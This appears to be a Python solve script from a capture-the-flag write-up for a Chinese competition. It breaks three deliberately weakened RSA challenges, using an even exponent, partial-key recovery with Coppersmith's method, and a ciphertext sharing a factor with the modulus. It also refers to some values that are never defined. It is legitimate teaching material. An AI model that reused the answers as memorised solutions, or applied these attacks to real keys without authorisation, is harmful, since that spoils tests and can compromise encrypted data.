b={'c':'3a80caebcee814e74a9d3d81b08b1130bed6edde2c0161799e1116ab837424fbc1a234b9765edfc47a9d634e1868105d4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705db3651211a1ec623a10bd60596e891ccc7b9364fbf2e306404aa2392f5598694dec0b8f7efc66e94e3f8a6f372d833941a2235ebf2fc77c163abcac274836380045b63cc9904d9b13c0935040eda6462b99dd01e8230fdfe2871124306e7bca5b356d16796351db37ec4e574137c926a4e07a2bfe76b9cbbfa4b5b010d678804df3e2f23b4ec42b8c8433fa4811bf1dc231855bea4225683529fad54a9b539fe824931b4fdafab67034e57338217f', 'p':'a9cb9e2eb43f17ad6734356db18ad744600d0c19449fc62b25db7291f24c480217d60a7f87252d890b97a38cc6943740ac344233446eea4084c1ba7ea5b7cf2399d42650b2a3f0302bab81295abfd7cacf248de62d3c63482c5ea8ab6b25cdbebc83eae855c1d07a8cf0408c2b721e43c4ac53262bf9aaf7a000000000000000', 'e':'10001', 'n': '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'}
c={'c':'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', 'n':'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', 'e':'10001'}
# Part a: e (0x292) is even, so invert e/2 and take the integer square root of the result.
d = inverse(int(a['e'],16)//2,(int(a['p'],16)-1)*(int(a['q'],16)-1))
#print(d)
m=(pow(int(a['c'],16),d,int(a['p'],16)*int(a['q'],16)))
print(long_to_bytes(iroot(m,2)[0]))
# Part b: p is given with its low bits zeroed ('p' above ends in 15 zero nibbles);
# the commented Sage snippet recovers it with small_roots, and the result is
# hard-coded as `p` below.  Decryption is done modulo p only.
N = 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
# pbar = 0xa9cb9e2eb43f17ad6734356db18ad744600d0c19449fc62b25db7291f24c480217d60a7f87252d890b97a38cc6943740ac344233446eea4084c1ba7ea5b7cf2399d42650b2a3f0302bab81295abfd7cacf248de62d3c63482c5ea8ab6b25cdbebc83eae855c1d07a8cf0408c2b721e43c4ac53262bf9aaf7a000000000000000
# ZmodN = Zmod(N)
# kbits = 60
# P.<x> = PolynomialRing(ZmodN)
# f = pbar + x
# x0 = f.small_roots(X=2^kbits, beta=0.4)[0]
# p = pbar + x0
# print("p: ", p)

p=119234372387564173916926418564504307771905987823894721284221707768770334474240277144999791051191061404002537779694672314673997030282474914206610847346023297970473719280866108677835517943804329212840618914863288766846702119011361533150365876285203805100986025166317939702179911918098037294325448226481818486521
e=0x10001

c=int('3a80caebcee814e74a9d3d81b08b1130bed6edde2c0161799e1116ab837424fbc1a234b9765edfc47a9d634e1868105d4458c9b9a0d399b870adbaa2337ac62940ade08daa8a7492cdedf854d4d3a05705db3651211a1ec623a10bd60596e891ccc7b9364fbf2e306404aa2392f5598694dec0b8f7efc66e94e3f8a6f372d833941a2235ebf2fc77c163abcac274836380045b63cc9904d9b13c0935040eda6462b99dd01e8230fdfe2871124306e7bca5b356d16796351db37ec4e574137c926a4e07a2bfe76b9cbbfa4b5b010d678804df3e2f23b4ec42b8c8433fa4811bf1dc231855bea4225683529fad54a9b539fe824931b4fdafab67034e57338217f', 16)
d = inverse(e,(p-1))
print(long_to_bytes(pow(c,d,p)))

# Part c: the ciphertext shares a factor with n, so gcd(c, n) yields p directly;
# the recovered plaintext is then divided by p and by 2022*1011 (as the
# challenge multiplied it; `e` is still 0x10001 from above).
c=int('1bd2a47a5d275ba6356e1e2bd10d6c870693be540e9318c746e807a7672f3a75cc63841170126d7dba52d7f6f9cf0f8dce9705fc1785cc670b2658b05d4b24d8918f95594844bfa920c8ffe73160c2c313b3fdbc4541ec19828165e34afa7d05271cc6fd59d08138b88c11677e6ac3b39cff525dcb19694b0388d895f53805a5e5bd8cfb947080e4855aaf83ebd85a397526f7d76d26031386900cb44a2e4bd121412bcee7a6c1e9af411e234f130e68a428596265d3ec647e50f65cb81393f4bd38389a2b9010fd715582506b9054dc235aced50757462b77a5606f116853af0c1ea3c7cf0d304f885d86081f8bac8b67b0625122f75448c5b6eb8f1cc8a0df', 16)
n=int('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', 16)
p=GCD(c,n)
q=n//p
assert n%p==0
d = inverse(e,(p-1)*(q-1))
M = pow(c,d,n)
print(M%p==0)
m = (M // p ) // (2022*1011)
print(long_to_bytes(m))

 

原文始发于微信公众号(山石网科安全技术研究院):鹏城杯WriteUp | Pwn、密码、Reverse方向
